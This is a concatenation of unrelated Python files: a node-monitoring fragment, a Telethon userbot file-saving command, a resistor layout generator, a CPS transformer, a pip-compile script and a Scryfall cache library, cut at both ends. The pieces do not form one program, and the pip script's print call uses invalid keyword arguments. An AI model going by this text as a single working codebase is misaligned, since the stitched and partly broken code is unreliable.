ret = thread_list[hostname].get_result()
json_ret = json.loads(ret)
if json_ret['result'] == False:
failed_list[hostname] = json_ret
print 'there are failed nodes'
# else:
# print 'Broadcasting to ' + hostname + ' success: ' + json_ret['value']
return failed_list
def update_monitoring_info(self, data):
try:
self.monitoring_lock.acquire()
result = {}
if data != None:
hostname = data['hostname']
json_data = json.loads(data[hostname])
self.monitoring_info[hostname] = json_data
result['result'] = True
result['value'] = 'Latency info has been updated'
# print hostname + ' monitoring data has been updated'
with open('monitoring_info', 'w') as output:
json.dump(self.monitoring_info, output)
else:
result['result'] = False
result['value'] = 'Data is not readable or not JSon format'
except:
print 'except happen'
raise
finally:
self.monitoring_lock.release()
return result
#need to be implemented each DC in mind
def get_monitoring_info(self, supported_storage=None):
#there is no monitored _info.
if len(self.monitoring_info) == 0:
#use history latency
with open('./trips_data/monitoring_info') as data_file:
monitoring_info = json.load(data_file)
for hostname in self.instance_list:
if supported_storage == None:
self.monitoring_info[hostname] = monitoring_info[hostname]
else:
self.monitoring_info[hostname] = {}
self.monitoring_info[hostname]['network_latency'] = monitoring_info[hostname]['network_latency']
self.monitoring_info[hostname]['storage_latency'] = {}
for storage in supported_storage:
if storage in monitoring_info[hostname]['storage_latency']:
self.monitoring_info[hostname]['storage_latency'][storage] = monitoring_info[hostname]['storage_latency'][storage]
return self.monitoring_info
|
from telethon import events
import asyncio
from userbot.utils import admin_cmd
@borg.on(admin_cmd(pattern="ttf ?(.*)"))
async def get(event):
name = event.text[5:]
m = await event.get_reply_message()
with open(name, "w") as f:
f.write(m.message)
await event.delete()
await borg.send_file(event.chat_id,name,force_document=True)
|
from .canvas import DefaultCanvas
from ...cell_fabric.generators import *
from ...cell_fabric.grid import *
import logging
logger = logging.getLogger(__name__)
class ResGenerator(DefaultCanvas):
def __init__(self, pdk, fin, finDummy):
super().__init__(pdk)
self.finsPerUnitCell = fin + 2*finDummy
# TODO: Generalize these
self.m1res = self.addGen( Wire( 'm1res', 'M1', 'v',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m1Pitch'], width=self.pdk['Cap']['m1Width']),
spg=EnclosureGrid( pitch=self.pdk['M2']['Pitch'], stoppoint=self.pdk['V1']['VencA_L'] +self.pdk['Cap']['m2Width']//2, check=True)))
self.m1res2 = self.addGen( Wire( 'm1res2', 'M1', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['M2']['Pitch'], width=self.pdk['Cap']['m1Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['Cap']['m1Width']//2, check=False)))
self.m2res = self.addGen( Wire( 'm2res', 'M2', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['M2']['Pitch'], width=self.pdk['Cap']['m2Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['V1']['VencA_H'] + self.pdk['Cap']['m1Width']//2, check=False)))
self.m2res2 = self.addGen( Wire( 'm2res2', 'M2', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m2Pitch'], width=self.pdk['Cap']['m2Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['V1']['VencA_H'] + self.pdk['Cap']['m1Width']//2)))
self.m3res = self.addGen( Wire( 'm3res', 'M3', 'v',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m3Pitch'], width=self.pdk['Cap']['m3Width']),
spg=EnclosureGrid(pitch=self.pdk['M2']['Pitch'], stoppoint=self.pdk['V2']['VencA_H'] + self.pdk['Cap']['m2Width']//2, check=True)))
self.v1res = self.addGen( Via( 'v1res', 'V1', h_clg=self.m2res.clg, v_clg=self.m1res.clg))
self.v2res = self.addGen( Via( 'v2res', 'V2', h_clg=self.m2res.clg, v_clg=self.m3res.clg))
self.Rboundary = self.addGen( Region( 'Rboundary', 'Rboundary', h_grid=self.m2.clg, v_grid=self.m1.clg))
def addResArray(self, x_cells, y_cells, height, unit_res):
for x in range(x_cells):
for y in range(y_cells):
self._addRes(x, y, height, unit_res, (x == x_cells-1) and (y == y_cells-1))
def _addRes( self, x, y, height, unit_res, draw_boundary=True):
y_length = self.finsPerUnitCell * self.pdk['Fin']['Pitch'] * height
assert y_length != 0, (self.finsPerUnitCell, self.pdk['Fin']['Pitch'], height)
res_per_length = 67
x_number = int(round(((1000*unit_res)/(res_per_length*y_length))))
assert x_number >= 1, (unit_res, res_per_length, y_length)
# ga = 2 if x_number == 1 else 1 ## when number of wires is 2 then large spacing req. so contact can be placed without a DRC error
# x_length = (x_number - 1) *ga*self.pdk['Cap']['m1Pitch']
y_number = int(2 *round(((y_length+self.pdk['Cap']['m2Pitch']-self.pdk['Cap']['m2Width'])/(2.0*self.pdk['Cap']['m2Pitch']))))
last_y1_track = ((y_number-1)*self.pdk['Cap']['m2Pitch']+self.pdk['M2']['Pitch']-1)//self.pdk['M2']['Pitch']
last_x_track = x_number - 1
m2factor = 2 ### number of m2-tracks (m2factor-1)in between two unitcells in y-direction
m1factor = 3
if (y_number-1) % 2 != last_y1_track % 2:
last_y1_track += 1 # so the last color is compatible with the external view of the cell
if last_y1_track % 2 == 1:
m2factor += 1 # so colors match in arrayed blocks
grid_cell_x_pitch = m1factor + last_x_track
grid_cell_y_pitch = m2factor + last_y1_track
grid_y0 = y*grid_cell_y_pitch
grid_y1 = grid_y0 + last_y1_track
for i in range(x_number):
(k, p) = (2*i, 1) if x_number==2 else (i, 0)
grid_x = k + x*grid_cell_x_pitch
self.addWire( self.m1res, None, None, grid_x, (grid_y0, -1), (grid_y1, 1))
if i < x_number-1:
grid_yh = ((i+1)%2)*last_y1_track
self.addWire( self.m1res2, None, None, grid_yh, (i, -1), (i+p+1, 1))
#
# Build the narrow m2 pitch grid starting at grid_cell_y_pitch*y in standard m2 pitch grids (m2.clg)
#
m2n = Wire( self.m2res2.nm, self.m2res2.layer, self.m2res2.direction,
clg=self.m2res2.clg.copyShift( self.m2res.clg.value( grid_cell_y_pitch*y)[0]),
spg=self.m2res2.spg)
#v1n = Via( 'v1', 'via1', h_clg=m2n.clg, v_clg=self.m1res.clg)
#v2n = Via( 'v2', 'via2', h_clg=m2n.clg, v_clg=self.m3res.clg)
grid_x0 = x*grid_cell_x_pitch
grid_x1 = grid_x0 + last_x_track
grid_y = (x_number%2)*last_y1_track
pin = 'PLUS'
self.addWire( m2n, 'PLUS', pin, 0, (0, -1), (0, 1))
self.addVia( self.v1res, None, None, 0, 0)
pin = 'MINUS'
self.addWire( self.m2res, 'MINUS', pin, grid_y, (grid_x1+p, -1), (grid_x1+p, 1))
self.addVia( self.v1res, None, None, grid_x1+p, grid_y)
if draw_boundary:
self.addRegion( self.boundary, 'boundary', None,
-1, -1,
last_x_track + x * grid_cell_x_pitch + 1 + p,
last_y1_track + y * grid_cell_y_pitch + 1)
self.addRegion( self.Rboundary, 'Rboundary', None,
-1, -1,
last_x_track + x * grid_cell_x_pitch + 1 + p,
last_y1_track + y * grid_cell_y_pitch + 1)
|
#!/usr/bin/env python
#
# Copyright (c) 2012, JT Olds <hello@jtolds.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Pants
http://www.pants-lang.org/
CPS transformation
Single pass delimited continuation transform:
T(v, ec, mc) => (ec v mc)
T(lam, ec, mc) => (ec M(lam) mc)
T(f e, ec, mc) => T(e, {|ve vm| T(f, {|vf vn| (vf ve ec vn)}, vm)}, mc)
T(f e, ec, mc) => T(e, {|ve vm| (f ve ec vm)}, mc)
T(f e, ec, mc) => (f e ec mc)
M({|...| e}) => {|... vc vm| T(e, vc, vm)}
reset = {|lam ec mc| (lam {|x vm| vm x} {|vd| (ec vd mc)})}
shift = {|lam ec mc| (lam {|x vc vm| ec x {|vd| vc vd vm}} {|x vm| vm x} mc)}
"""
__author__ = "JT Olds"
__author_email__ = "hello@jtolds.com"
__all__ = ["transform"]
import itertools
import types as cps
import ir.types as ir
from common.errors import TransformationError
from common.errors import assert_source
IDENTITY_CONT = cps.Identifier("identity_cont", False, 0, 0)
HALT_CONT = cps.Identifier("halt_cont", False, 0, 0)
RESET = cps.Identifier("reset", True, 0, 0)
SHIFT = cps.Identifier("shift", True, 0, 0)
class Transformer(object):
def __init__(self):
self.varcount = 0
def gensym(self, line, col):
self.varcount += 1
return cps.Identifier("cps_%x" % self.varcount, False, line, col)
def transform_value(self, value):
if not isinstance(value, ir.Function): return value
exp, comp_cont, delim_cont = self.transform(value)
return cps.Callable(exp, value.left_args, value.right_args, comp_cont,
delim_cont, value.line, value.col)
def transform(self, node):
comp_cont = self.gensym(node.line, node.col)
delim_cont = self.gensym(node.line, node.col)
lastval = node.lastval
expressions = node.expressions
if (expressions and isinstance(expressions[-1], ir.ReturnValue)
and isinstance(lastval, ir.Variable)
and expressions[-1].assignee == lastval.identifier):
expressions, ir_exp = expressions[:-1], expressions[-1]
exp = cps.Call(ir_exp.call, ir_exp.left_args, ir_exp.right_args,
cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
ir_exp.line, ir_exp.col)
else:
exp = cps.Call(cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
[], [cps.PositionalOutArgument(lastval, lastval.line, lastval.col)],
None, cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
node.line, node.col)
for ir_exp in reversed(expressions):
exp, comp_cont, delim_cont = self.transform_expression(
ir_exp, exp, comp_cont, delim_cont)
# this provides access to the undelimited function-specific continuation
cont = cps.Identifier("cont", True, exp.line, exp.col)
if exp.references(cont):
arg = self.gensym(exp.line, exp.col)
cont_call = cps.Call(
cps.Variable(comp_cont, comp_cont.line, comp_cont.col), [],
[cps.PositionalOutArgument(
cps.Variable(arg, arg.line, arg.col),
arg.line, arg.col)],
cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
exp.line, exp.col)
cont_callable = cps.Callable(
cont_call, [],
[cps.RequiredInArgument(arg, arg.line, arg.col)],
None, None, exp.line, exp.col)
exp = cps.Assignment(cont, cont_callable, True, exp, exp.line, exp.col)
return exp, comp_cont, delim_cont
def transform_expression(self, ir_exp, next_cps_exp, comp_cont, delim_cont):
if isinstance(ir_exp, ir.Assignment):
return (self.transform_assignment(ir_exp, next_cps_exp),
comp_cont, delim_cont)
if isinstance(ir_exp, ir.ObjectMutation):
return (self.transform_object_mutation(ir_exp, next_cps_exp),
comp_cont, delim_cont)
assert isinstance(ir_exp, ir.ReturnValue)
return self.transform_return_value(ir_exp, next_cps_exp, comp_cont,
delim_cont)
def transform_assignment(self, ir_exp, next_cps_exp):
return cps.Assignment(ir_exp.assignee, self.transform_value(ir_exp.value),
ir_exp.local, next_cps_exp, ir_exp.line, ir_exp.col)
def transform_object_mutation(self, ir_exp, next_cps_exp):
return cps.ObjectMutation(ir_exp.object, ir_exp.field,
self.transform_value(ir_exp.value), next_cps_exp, ir_exp.line,
ir_exp.col)
def transform_return_value(self, ir_exp, next_cps_exp, comp_cont,
delim_cont):
child_comp_cont = cps.Callable(next_cps_exp, [], [cps.RequiredInArgument(
ir_exp.assignee, ir_exp.line, ir_exp.col)], None, delim_cont,
ir_exp.line, ir_exp.col)
child_comp_cont_sym = self.gensym(ir_exp.line, ir_exp.col)
new_delim_cont = self.gensym(ir_exp.line, ir_exp.col)
call = cps.Call(ir_exp.call, ir_exp.left_args, ir_exp.right_args,
cps.Variable(child_comp_cont_sym, ir_exp.line, ir_exp.col),
cps.Variable(new_delim_cont, ir_exp.line, ir_exp.col),
ir_exp.line, ir_exp.col)
return cps.Assignment(child_comp_cont_sym, child_comp_cont, True, call,
ir_exp.line, ir_exp.col), comp_cont, new_delim_cont
def transform(ir_root):
trans = Transformer()
exp, comp_cont, delim_cont = trans.transform(ir_root)
predef = CPSPredefines(exp, trans.gensym)
predef.define_reset()
predef.define_shift()
predef.define_delim_cont(delim_cont)
predef.define_comp_cont(comp_cont)
predef.define_identity_cont()
return predef.result()
class CPSPredefines(object):
def __init__(self, initial_exp, gensym):
self.exp = initial_exp
self.gensym = gensym
def result(self):
return self.exp
def define_identity_cont(self):
val = self.gensym(0, 0)
delim_cont = self.gensym(0, 0)
ident_call = cps.Call(
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
[],
[cps.PositionalOutArgument(
cps.Variable(val, val.line, val.col), val.line, val.col)],
None, None, val.line, val.col)
ident_cont = cps.Callable(ident_call, [],
[cps.RequiredInArgument(val, val.line, val.col)],
None, delim_cont, val.line, val.col)
self.exp = cps.Assignment(IDENTITY_CONT,
ident_cont, True, self.exp, 0, 0)
def define_comp_cont(self, comp_cont):
self.exp = cps.Assignment(
comp_cont,
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
True, self.exp, 0, 0)
def define_delim_cont(self, delim_cont):
self.exp = cps.Assignment(
delim_cont,
cps.Variable(HALT_CONT, HALT_CONT.line, HALT_CONT.col),
True, self.exp, 0, 0)
def define_reset(self):
# {|lam ec mc|
# reset_delim_sym = {|vd| (ec vd mc)}
# (lam ident_cont reset_delim_sym)}
if not self.exp.references(RESET):
return
lam = self.gensym(0, 0)
ec = self.gensym(0, 0)
mc = self.gensym(0, 0)
vd = self.gensym(0, 0)
reset_delim_sym = self.gensym(0, 0)
reset_delim_body = cps.Call(
cps.Variable(ec, ec.line, ec.col), [],
[cps.PositionalOutArgument(
cps.Variable(vd, vd.line, vd.col), vd.line, vd.col)],
None, cps.Variable(mc, mc.line, mc.col), 0, 0)
reset_delim_cont = cps.Callable(reset_delim_body, [],
[cps.RequiredInArgument(vd, vd.line, vd.col)], None, None, 0, 0)
reset_body = cps.Call(
cps.Variable(lam, lam.line, lam.col),
[], [],
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
cps.Variable(reset_delim_sym, reset_delim_sym.line,
reset_delim_sym.col), 0, 0)
reset_body = cps.Assignment(reset_delim_sym, reset_delim_cont, True,
reset_body, 0, 0)
reset_callable = cps.Callable(reset_body, [],
[cps.RequiredInArgument(lam, lam.line, lam.col)], ec, mc, 0, 0)
self.exp = cps.Assignment(RESET, reset_callable, True, self.exp, 0, 0)
def define_shift(self):
# {|lam ec mc|
# user_sym = {|x vc vm|
# reset_delim_sym = {|vd| vc vd vm}
# (ec x reset_delim_sym)}
# (lam user_sym identity_cont mc)}
if not self.exp.references(SHIFT):
return
lam = self.gensym(0, 0)
ec = self.gensym(0, 0)
mc = self.gensym(0, 0)
x = self.gensym(0, 0)
vc = self.gensym(0, 0)
vm = self.gensym(0, 0)
vd = self.gensym(0, 0)
reset_delim_sym = self.gensym(0, 0)
user_sym = self.gensym(0, 0)
reset_delim_body = cps.Call(cps.Variable(vc, vc.line, vc.col), [],
[cps.PositionalOutArgument(
cps.Variable(vd, vd.line, vd.col), vd.line, vd.col)], None,
cps.Variable(vm, vm.line, vm.col), 0, 0)
reset_delim_cont = cps.Callable(reset_delim_body, [],
[cps.RequiredInArgument(vd, vd.line, vd.col)], None, None, 0, 0)
user_body = cps.Call(cps.Variable(ec, ec.line, ec.col), [],
[cps.PositionalOutArgument(
cps.Variable(x, x.line, x.col), x.line, x.col)], None,
cps.Variable(
reset_delim_sym, reset_delim_sym.line, reset_delim_sym.col), 0, 0)
user_body = cps.Assignment(reset_delim_sym, reset_delim_cont, True,
user_body, 0, 0)
user_cont = cps.Callable(user_body, [],
[cps.RequiredInArgument(x, x.line, x.col)], vc, vm, 0, 0)
shift_body = cps.Call(cps.Variable(lam, lam.line, lam.col), [],
[cps.PositionalOutArgument(
cps.Variable(user_sym, user_sym.line, user_sym.col),
user_sym.line, user_sym.col)],
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
cps.Variable(mc, mc.line, mc.col), 0, 0)
shift_body = cps.Assignment(user_sym, user_cont, True, shift_body, 0, 0)
shift_callable = cps.Callable(shift_body, [],
[cps.RequiredInArgument(lam, lam.line, lam.col)], ec, mc, 0, 0)
self.exp = cps.Assignment(SHIFT, shift_callable, True, self.exp, 0, 0)
|
#!/usr/bin/env python3
import os
import subprocess
import sys
def main():
result = subprocess.run(['pip', 'show', 'pip-tools'], stdout=subprocess.PIPE)
if not result.stdout.strip():
print('This script requires the pip-tools package be installed:\n'
' pip install pip-tools', fg='white', bg='red')
sys.exit(1)
req_args = ['pip-compile', '--output-file', 'requirements.txt',
'requirements.in', '--upgrade']
print('Running ' + ' '.join(req_args))
subprocess.run(req_args, stdout=subprocess.PIPE)
dev_req_args = ['pip-compile', '--output-file', 'requirements-dev.txt',
'requirements-dev.in', '--upgrade']
print('Running ' + ' '.join(dev_req_args))
subprocess.run(dev_req_args, stdout=subprocess.PIPE)
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
requirements = f.read()
dev_requirements_path = os.path.join(os.getcwd(), 'requirements-dev.txt')
with open(dev_requirements_path) as f:
dev_requirements = f.read()
reqs = set([line[:line.find('==')]
for line in requirements.splitlines()
if line and not line.startswith('#')])
dev_reqs = [line for line in dev_requirements.splitlines()
if line and not line.startswith('#')
and line[:line.find('==')] not in reqs]
new_dev_reqs = [line for line in dev_requirements.splitlines()
if line.startswith('#')] + ['-r requirements.txt', ''] + dev_reqs
with open(dev_requirements_path, 'w') as f:
f.write('\n'.join(new_dev_reqs) + '\n')
print('Successfully updated requirements.txt and requirements-dev.txt')
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""Classes for main Scryfall cache objects."""
import logging
import os
import shutil
import time
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import appdirs
from pony import orm
import requests
from requests_ratelimit_adapter import HTTPRateLimitAdapter
log = logging.getLogger(__name__)
# Module information
__version__ = "0.2.2"
__author__ = """Max Dymond"""
__email__ = "cmeister2@gmail.com"
package = "scryfall_cache"
# Define a rate limiter adapter for Scryfall. The upper limit is 10 requests
# per second or 1 every 100ms.
ScryfallRateLimiter = HTTPRateLimitAdapter(calls=1, period=0.1)
# Define time periods in seconds
ONE_DAY = 24 * 60 * 60
TWELVE_WEEKS = 12 * 7 * ONE_DAY
class ScryfallCacheException(Exception):
"""Exception raised by ScryfallCache."""
pass
class ScryfallCache(object):
"""Main cache object."""
BULK_DATA_LIST = "default_cards"
DATABASE_FILENAME = "scryfallcache.sqlite3"
def __init__(
self,
application=None,
version=None,
bulk_update_period=TWELVE_WEEKS,
sql_debug=False,
):
"""Construct a ScryfallCache object.
Args:
application (str): Name of application to use for cached data.
version (str): Version string of application. If None, no version is used.
bulk_update_period (int): The period after which the cache is bulk-updated.
sql_debug (bool): Whether SQL debug commands are shown.
"""
self.bulk_update_period = bulk_update_period
# Create a requests Session and mount the rate limiter to protect
# Scryfall.
self.session = requests.Session()
self.session.mount("http://", ScryfallRateLimiter)
self.session.mount("https://", ScryfallRateLimiter)
# Create an Appdirs instance to find where the local cache should
# be stored.
self.app = appdirs.AppDirs(package, application, version=version)
# If the cache folders do not exist, make them.
if not os.path.isdir(self.app.user_data_dir):
os.makedirs(self.app.user_data_dir)
# Get the local database.
self.database_path = os.path.join(
self.app.user_data_dir, self.DATABASE_FILENAME
)
log.debug("Scryfall database path: %s", self.database_path)
# Create local instances of database objects
self.db = open_database(self.database_path, create_db=True, sql_debug=sql_debug)
# Check the database for an update.
self._check_database()
def get_cache_directory(self):
"""
Get the top level cache directory that this instance is using.
Useful for other libraries if they want to store data in
ScryfallCache's cache folder.
Returns:
str: the cache directory path.
"""
return self.app.user_data_dir
def get_card(self, name=None, scryfall_id=None, mtgo_id=None):
"""
Attempt to get a ScryfallCard object for any given identifiers.
Args:
name (str): The name of the card if known.
scryfall_id (str): The Scryfall ID of the card if known.
mtgo_id (int): The MTGO ID of the card if known.
Raises:
ScryfallCacheException: if no identifiers are given.
Returns:
ScryfallCard if ID found, else None.
"""
if name is not None:
card_dict = self._card_from_name(name)
elif scryfall_id is not None:
card_dict = self._card_from_id(scryfall_id)
elif mtgo_id is not None:
card_dict = self._card_from_mtgo_id(mtgo_id)
else:
raise ScryfallCacheException("Require at least one identifier to query on")
# Check the card dictionary.
if not card_dict:
return None
# Found a card dictionary containing all the necessary information.
# Pass a ScryfallCard back to the user.
return ScryfallCard(self, card_dict)
def _card_from_id(self, scryfall_id):
"""Request a card data dictionary by Scryfall ID.
Args:
scryfall_id(str): The Scryfall ID of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
# This is safe because id is a primary key, so there should be 0
# or 1 entries.
result = self.db.Card.get(id=scryfall_id)
if result:
card_json = result.data
else:
log.debug("Card not found in database: %s", scryfall_id)
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/{scryfall_id}".format(
scryfall_id=scryfall_id
),
timeout=ONE_DAY,
)
if card_json:
# Save this card for future as it wasn't found first time.
self._save_card(card_json)
return card_json
def _card_from_name(self, name):
"""Request a card dictionary by name.
Args:
name (str): The name of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
results = orm.select(c for c in self.db.Card if c.name == name)
if not results:
results = []
cards_json = [m.data for m in results]
if len(cards_json) == 1:
log.debug("Returning single result for name %s", name)
card_json = cards_json[0]
else:
log.debug("Got %d results for name %s", len(cards_json), name)
# Encode the URL parameters.
params = urlencode({"exact": name})
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/named?{params}".format(params=params),
timeout=ONE_DAY,
)
if card_json and len(cards_json) == 0:
# Save this card for future as no cards were found first time.
self._save_card(card_json)
return card_json
def _card_from_mtgo_id(self, mtgo_id):
"""Request a card dictionary by MTGO ID.
Args:
mtgo_id(int): The MTGO ID of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
# Search for the normal or foil version of the card.
results = orm.select(
c for c in self.db.Card
if c.mtgo_id == mtgo_id or c.mtgo_foil_id == mtgo_id
)
if not results:
results = []
cards_json = [m.data for m in results]
if len(cards_json) == 1:
log.debug("Returning single result for MTGO ID %d", mtgo_id)
card_json = cards_json[0]
else:
log.debug(
"Expected 1 result for MTGO ID %d, got %d results instead",
mtgo_id,
len(cards_json),
)
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/mtgo/{mtgo_id}".format(mtgo_id=mtgo_id),
timeout=ONE_DAY,
)
if card_json and len(cards_json) == 0:
# Save this card for future as no cards were found first time.
self._save_card(card_json)
return card_json
def _save_card(self, card_data):
# Insert this into the database.
with orm.db_session:
log.debug("Saving card information to database for %s", card_data["id"])
self.db.Card(
id=card_data["id"],
name=card_data["name"],
mtgo_id=card_data.get("mtgo_id", None),
mtgo_foil_id=card_data.get("mtgo_foil_id", None),
data=card_data,
)
def _check_database(self):
with orm.db_session:
metadata = orm.select(m for m in self.db.Metadata).first()
if not metadata:
# Create a new metadata object. Record the version of ScryfallCache
# that we're using here, so we can migrate later.
metadata = self.db.Metadata(lastupdate=0, version=__version__)
if metadata.lastupdate + self.bulk_update_period < time.time():
log.debug(
"Updating database due to aging out (%d)", self.bulk_update_period
)
self._bulk_update_database()
def _bulk_clear_database(self):
# We need to clear the database out. Delete all the cards in the database.
with orm.db_session:
orm.delete(c for c in self.db.Card)
def _bulk_update_database(self):
# Request the /bulkdata endpoint from Scryfall. Do not request this from cache.
bulk_req = self.session.get("https://api.scryfall.com/bulk-data")
bulk_req.raise_for_status()
bulkdata = bulk_req.json()
# Get the URI for the all_cards object.
for obj in bulkdata["data"]:
if obj["type"] == self.BULK_DATA_LIST:
bulk_data_list_uri = obj["permalink_uri"]
break
else:
raise ScryfallCacheException(
"Failed to find {0}".format(self.BULK_DATA_LIST)
)
# Request the bulk data list from the URI we just queried.
bulk_data_list_req = self.session.get(bulk_data_list_uri)
bulk_data_list_req.raise_for_status()
# Clear the database of cards.
self._bulk_clear_database()
# Insert the data into the database.
log.debug("Starting bulk card insertion")
with orm.db_session:
for card_obj in bulk_data_list_req.json():
# Create the card.
self.db.Card(
id=card_obj["id"],
name=card_obj["name"],
mtgo_id=card_obj.get("mtgo_id", None),
mtgo_foil_id=card_obj.get("mtgo_foil_id", None),
data=card_obj,
)
log.debug("Finished bulk card insertion")
# Update the metadata to store the latest timestamp
self._update_metadata()
def _update_metadata(self):
with orm.db_session:
metadata = orm.select(m for m in self.db.Metadata).first()
# Update the timestamp
metadata.lastupdate = int(time.time())
log.debug("Updated metadata: last update now %d", metadata.lastupdate)
def _download_scryfall_to_file(self, url, target_path):
tmp_file = "{0}._scry".format(target_path)
log.debug("Downloading %s to %s", url, tmp_file)
req = self.session.get(url, stream=True)
req.raise_for_status()
with open(tmp_file, "wb") as f:
for chunk in req.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
log.debug("Downloaded %s to %s", url, tmp_file)
# Move the temporary file to the new destination.
shutil.move(tmp_file, target_path)
log.debug("Moved temporary download file %s to %s", tmp_file, target_path)
def _query_scryfall(self, url, timeout=ONE_DAY):
with orm.db_session:
result = self.db.ScryfallResultCache.get(url=url)
now = int(time.time())
if result and result.timestamp + timeout > now:
log.debug("Found result in cache")
return result.data
# Query Scryfall.
try:
res = self.session.get(url)
res.raise_for_status()
# Convert the result to an object.
card_data = res.json()
# Store the result in the database.
with orm.db_session:
log.debug("Storing result for url %s at timestamp %d", url, now)
self.db.ScryfallResultCache(url=url, timestamp=now, data=card_data)
return card_data
except requests.exceptions.RequestException:
log.exception("Failed to find information from URL: %s", url)
return None
def get_local_image_path(self, card, art_format):
"""Retrieve the local image path for a given image.
If necessary, download the image into place before returning.
Args:
card (ScryfallCard): ScryfallCard object returned from get_card().
art_format (str): One of the art formats to download. See
https://scryfall.com/docs/api/images for more detail.
Raises:
ScryfallCacheException: on failure
Returns:
str: the file path
"""
card_data = card.get_dict()
if "image_uris" not in card_data:
log.error("[%s] No images found", card)
raise ScryfallCacheException("No images found")
if art_format not in card_data["image_uris"]:
log.error("[%s] Format %r not found", card, art_format)
raise ScryfallCacheException("Art format {0} not found".format(art_format))
uri = card_data["image_uris"][art_format]
log.debug("[%s] Image URI for %r: %s", card, art_format, uri)
# Create the folders necessary to store this image.
art_cache_path = os.path.join(self.app.user_data_dir, "art_cache", art_format)
if not os.path.isdir(art_cache_path):
os.makedirs(art_cache_path)
# Determine the extension. As per the API, everything is a JPG except PNG.
if art_format == "png":
extension = "png"
else:
extension = "jpg"
local_path = os.path.join(
art_cache_path,
"{id}.{extension}".format(id=card.get_id(), extension=extension),
)
log.debug("[%s] Local image path for %s: %s", card, art_format, local_path)
if not os.path.exists(local_path):
# Need to download that image!
self._download_scryfall_to_file(uri, local_path)
return local_path
def close(self):
"""Close the connection to the database."""
self.db.disconnect()
class ScryfallCard(object):
"""Wrapper object for a Scryfall card data dictionary."""
def __init__(self, cache, card_dict):
"""
Construct a ScryfallCard.
Args:
cache (ScryfallCache): reference to parent Cache object.
card_dict (dict): Card data dictionary.
"""
self._id = card_dict["id"]
self._name = card_dict["name"]
self._cache = cache
self._card_dict = card_dict
def __repr__(self):
"""
Return a str representation of this object when it was constructed.
Returns:
str: A representation of this object when it was constructed.
"""
return "{self.__class__.__name__}({self._cache!r}, {self._card_dict!r})".format(
self=self
)
def __str__(self):
"""
Return a useful str representation of this object.
Returns:
str: A useful representation of this object
"""
return "{self.__class__.__name__}[{self._name} @ {self._id}]".format(self=self)
def get_id(self):
"""
Return the Scryfall ID for this card.
Returns:
str: The Scryfall ID for this card.
"""
return self._id
def get_name(self):
"""
Return the name for this card.
Returns:
str: The name of this card.
"""
return self._name
def get_dict(self):
"""
Return the card data dictionary for this card.
Returns:
dict: The card data dictionary for this card.
"""
return self._card_dict
def get_image_path(self, art_format):
"""
Get or download the chosen art format for this card.
Args:
art_format (str): One of the art formats to download. See
https://scryfall.com/docs/api/images for more detail.
Returns:
str: Path to local file.
"""
return self._cache.get_local_image_path(self, art_format)
def define_entities(db):
"""Define entities on a database object.
Args:
db (orm.Database): Database object to define entities on.
"""
class Card(db.Entity):
"""Card database object as retrieved from Scryfall."""
id = orm.PrimaryKey(str)
name = orm.Required(str, index=True)
mtgo_id = orm.Optional(int, index=True)
mtgo_foil_id = orm.Optional(int, index=True)
data = orm.Required(orm.Json)
class Metadata(db.Entity):
"""Metadata about the cache."""
lastupdate = orm.Required(int)
version = orm.Required(str)
class ScryfallResultCache(db.Entity):
"""URL response retrieved from Scryfall."""
url = orm.PrimaryKey(str)
timestamp = orm.Required(int)
data = orm.Required(orm.Json)
def open_database(database_path, create_db=True, sql_debug=False):
"""Create a connection to an sqlite database.
Args:
database_path (str): Path to the sqlite database.
